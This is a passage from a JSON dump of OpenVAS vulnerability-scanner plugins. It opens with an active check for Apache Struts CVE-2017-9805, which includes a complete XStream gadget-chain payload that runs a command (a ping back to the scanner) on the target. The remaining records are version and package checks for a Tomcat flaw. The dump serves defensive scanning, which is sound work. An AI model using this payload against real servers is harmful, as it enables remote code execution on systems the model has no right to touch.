the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811730\");\n script_version(\"2019-11-12T09:49:27+0000\");\n script_cve_id(\"CVE-2017-9805\");\n script_bugtraq_id(100609);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-12 09:49:27 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-07 16:39:09 +0530 (Thu, 07 Sep 2017)\");\n script_name(\"Apache Struts 'REST Plugin With XStream Handler' RCE Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://struts.apache.org/docs/s2-052.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request and check\n whether we are able to execute arbitrary code or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within the REST plugin which\n is using a XStreamHandler with an instance of XStream for deserialization\n without any type filtering.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow\n an attacker to execute arbitrary code in the context of the affected application.\n Failed exploit attempts will likely result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.5 through 2.5.12,\n 2.1.2 through 2.3.33.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.5.13\n or 2.3.34 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = get_http_port(default:8080);\nhost = http_host_name(dont_add_port:TRUE);\n\nforeach ext(make_list(\"action\", \"do\", \"jsp\")){\n exts = http_get_kb_file_extensions(port:port, host:host, ext:ext);\n if(exts && is_array(exts)){\n found = TRUE;\n break;\n }\n}\n\nif( ! found )\n exit( 0 );\n\nhost = http_host_name(port:port);\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nif(host_runs(\"Windows\") == \"yes\"){\n COMMAND = '<string>ping</string><string>-n</string><string>3</string><string>' + this_host() + '</string>';\n win = TRUE;\n}else{\n ##For Linux and Unix platform\n vtstrings = get_vt_strings();\n check = vtstring[\"ping_string\"];\n pattern = hexstr(check);\n COMMAND = '<string>ping</string><string>-c</string><string>3</string><string>-p</string><string>' + pattern + '</string><string>' + this_host() + '</string>';\n}\n\ndata =\n' <map>\n <entry>\n <jdk.nashorn.internal.objects.NativeString>\n <flags>0</flags>\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n <dataHandler>\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n <is class=\"javax.crypto.CipherInputStream\">\n <cipher class=\"javax.crypto.NullCipher\">\n <initialized>false</initialized>\n <opmode>0</opmode>\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"java.util.Collections$EmptyIterator\"/>\n <next class=\"java.lang.ProcessBuilder\">\n <command>\n ' + COMMAND + '\n </command>\n <redirectErrorStream>false</redirectErrorStream>\n </next>\n </iter>\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n <method>\n <class>java.lang.ProcessBuilder</class>\n <name>start</name>\n <parameter-types/>\n </method>\n <name>foo</name>\n </filter>\n <next class=\"string\">foo</next>\n </serviceIterator>\n <lock/>\n </cipher>\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n <ibuffer/>\n <done>false</done>\n <ostart>0</ostart>\n <ofinish>0</ofinish>\n <closed>false</closed>\n </is>\n <consumed>false</consumed>\n </dataSource>\n <transferFlavors/>\n </dataHandler>\n <dataLen>0</dataLen>\n </value>\n </jdk.nashorn.internal.objects.NativeString>\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n <entry>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n </map>';\nlen = strlen(data);\nurl = '/struts2-rest-showcase/orders/3';\nreq = http_post_req( port: port,\n url: url,\n data: data,\n add_headers: make_array( 'Content-Type', 'application/xml'));\n\nres = send_capture( socket:soc,\n data:req,\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\nclose(soc);\n\nif(res && (win || check >< res)){\n report = \"It was possible to execute command remotely at \" + report_vuln_url( port:port, url:url, url_only:TRUE ) + \" with the command '\" + COMMAND + \"'.\";\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "description": "Aniket Nandkishor Kulkarni discovered that in tomcat7, a servlet and\nJSP engine, static error pages used the original request", "modified": "2019-03-18T00:00:00", "published": "2017-06-22T00:00:00", "id": "OPENVAS:1361412562310703892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703892", "title": "Debian Security Advisory DSA 3892-1 (tomcat7 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3892.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3892-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703892\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-5664\");\n script_name(\"Debian Security Advisory DSA 3892-1 (tomcat7 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-22 00:00:00 +0200 (Thu, 22 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3892.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|10|8)\");\n script_tag(name:\"affected\", value:\"tomcat7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.0.56-3+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.0.72-3.\n\nFor the testing distribution (buster), this problem has been fixed\nin version 7.0.72-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.0.72-3.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name:\"summary\", value:\"Aniket Nandkishor Kulkarni discovered that in tomcat7, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.72-3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.72-3\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.72-3\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.72-3\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u11\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:14", "bulletinFamily": "scanner", "description": "Aniket Nandkishor Kulkarni discovered that in tomcat8, a servlet and\nJSP engine, static error pages used the original request", "modified": "2019-03-18T00:00:00", "published": "2017-06-22T00:00:00", "id": "OPENVAS:1361412562310703891", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703891", "title": "Debian Security Advisory DSA 3891-1 (tomcat8 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3891.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3891-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703891\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-5664\");\n script_name(\"Debian Security Advisory DSA 3891-1 (tomcat8 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-22 00:00:00 +0200 (Thu, 22 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3891.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|10|8)\");\n script_tag(name:\"affected\", value:\"tomcat8 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 8.0.14-1+deb8u10.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 8.5.14-1+deb9u1.\n\nFor the testing distribution (buster), this problem has been fixed\nin version 8.5.14-2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 8.5.14-2.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name:\"summary\", value:\"Aniket Nandkishor Kulkarni discovered that in tomcat8, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.14-1+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.14-2\", rls:\"DEB10\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u10\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:52", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-01T00:00:00", "id": "OPENVAS:1361412562310811305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811305", "title": "Fedora Update for tomcat FEDORA-2017-63789c8c29", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tomcat FEDORA-2017-63789c8c29\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811305\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-01 05:25:34 +0200 (Sat, 01 Jul 2017)\");\n script_cve_id(\"CVE-2017-5664\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tomcat FEDORA-2017-63789c8c29\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"tomcat on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-63789c8c29\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JTH7GWGHFMKCCECCCULI67UD5TTIOZTY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~8.0.44~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:32", "bulletinFamily": "scanner", "description": "This host is installed with Apache Tomcat\n and is prone to security bypass vulnerability.", "modified": "2019-05-10T00:00:00", "published": "2017-06-07T00:00:00", "id": "OPENVAS:1361412562310811140", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811140", "title": "Apache Tomcat Security Bypass Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_tomcat_security_bypass_vuln_win.nasl 73877 2017-07-07 11:25:47 +0530 March$\n#\n# Apache Tomcat Security Bypass Vulnerability (Windows)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811140\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2017-5664\");\n script_bugtraq_id(98888);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-07 15:08:52 +0530 (Wed, 07 Jun 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Tomcat Security Bypass Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The error page mechanism of the Java Servlet\n Specification requires that, when an error occurs and an error page is\n configured for the error that occurred, the original request and response are\n forwarded to the error page. This means that the request is presented to the\n error page with the original HTTP method. If the error page is a static file,\n expected behaviour is to serve content of the file as if processing a GET request,\n regardless of the actual HTTP method. Tomcat's Default Servlet did not do this.\n Depending on the original request this could lead to unexpected and undesirable\n results for static error pages including, if the DefaultServlet is configured to\n permit writes, the replacement or removal of the custom error page\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n exploit this issue to bypass certain security restrictions and perform\n unauthorized actions. This may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat 9.0.0.M1 to 9.0.0.M20,\n Apache Tomcat 8.5.0 to 8.5.14,\n Apache Tomcat 8.0.0.RC1 to 8.0.43 and\n Apache Tomcat 7.0.0 to 7.0.77 on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 9.0.0.M21, or 8.5.15,\n or 8.0.44, or 7.0.78 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://lists.apache.org/thread.html/a42c48e37398d76334e17089e43ccab945238b8b7896538478d76066@%3Cannounce.tomcat.apache.org%3E\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos[\"version\"];\npath = infos[\"location\"];\n\nif(appVer =~ \"^[7-9]\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"8.5.0\", test_version2:\"8.5.14\")){\n fix = \"8.5.15\";\n }\n\n else if(version_in_range(version:appVer, test_version:\"8.0.0.RC1\", test_version2:\"8.0.43\")){\n fix = \"8.0.44\";\n }\n\n else if(version_in_range(version:appVer, test_version:\"7.0\", test_version2:\"7.0.77\")){\n fix = \"7.0.78\";\n }\n\n else if(version_in_range(version:appVer, test_version:\"9.0.0.M1\", test_version2:\"9.0.0.M20\")){\n fix = \"9.0.0.M21\";\n }\n\n if(fix)\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:tomPort);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:57:25", "bulletinFamily": "scanner", "description": "Aniket Nandkishor Kulkarni discovered that in tomcat8, a servlet and\nJSP engine, static error pages used the original request", "modified": "2017-07-07T00:00:00", "published": "2017-06-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703891", "id": "OPENVAS:703891", "title": "Debian Security Advisory DSA 3891-1 (tomcat8 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3891.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3891-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703891);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2017-5664\");\n script_name(\"Debian Security Advisory DSA 3891-1 (tomcat8 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: 